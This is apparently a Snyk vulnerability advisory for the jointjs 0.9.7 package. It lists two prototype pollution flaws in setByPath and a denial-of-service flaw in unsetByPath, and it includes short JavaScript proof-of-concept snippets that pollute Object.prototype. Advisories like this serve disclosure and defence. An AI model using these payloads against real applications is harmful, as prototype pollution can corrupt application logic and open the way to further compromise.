org.webjars.bower:jointjs@0.9.7 vulnerabilities

  • latest version

    2.0.1

  • first published

    9 years ago

  • latest version published

    7 years ago

  • licenses detected

  • package manager

  • Direct Vulnerabilities

    Known vulnerabilities in the org.webjars.bower:jointjs package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Prototype Pollution

    org.webjars.bower:jointjs is a JavaScript diagramming library. It can be used to create either static diagrams or, and more importantly, fully interactive diagramming tools and application builders.

    Affected versions of this package are vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-28480 when the user-provided keys used in the path parameter are arrays in the setByPath function.

    PoC

    const jointjs = require("jointjs");
    
    // jointjs.util.setByPath({}, '__proto__/polluted', 'yes');
    // jointjs.util.setByPath({}, ['__proto__', 'polluted'], 'yes');
    // console.log(polluted); // ReferenceError: polluted is not defined
    
    jointjs.util.setByPath({}, [['__proto__'], 'polluted'], 'yes');
    console.log(polluted); // yes
    

    How to fix Prototype Pollution?

    There is no fixed version for org.webjars.bower:jointjs.

    [0,)
    • M
    Denial of Service (DoS)

    org.webjars.bower:jointjs is a JavaScript diagramming library. It can be used to create either static diagrams or, and more importantly, fully interactive diagramming tools and application builders.

    Affected versions of this package are vulnerable to Denial of Service (DoS) via the unsetByPath function.

    How to fix Denial of Service (DoS)?

    There is no fixed version for org.webjars.bower:jointjs.

    [0,)
    • H
    Prototype Pollution

    org.webjars.bower:jointjs is a JavaScript diagramming library. It can be used to create either static diagrams or, and more importantly, fully interactive diagramming tools and application builders.

    Affected versions of this package are vulnerable to Prototype Pollution via util.setByPath (https://resources.jointjs.com/docs/jointjs/v3.2/joint.html#util.setByPath). The path used the access the object's key and set the value is not properly sanitized, leading to a Prototype Pollution.

    PoC

    const jointjs = require("jointjs");
    
    const obj = {};
    console.log("Before : " + obj.polluted);
    jointjs.util.setByPath({ }, '__proto__/polluted', "yes", '/');
    // jointjs.util.setByPath({ }, 'constructor/prototype/polluted', "yes", '/');
    console.log("After : " + obj.polluted);
    

    How to fix Prototype Pollution?

    There is no fixed version for org.webjars.bower:jointjs.

    [0,)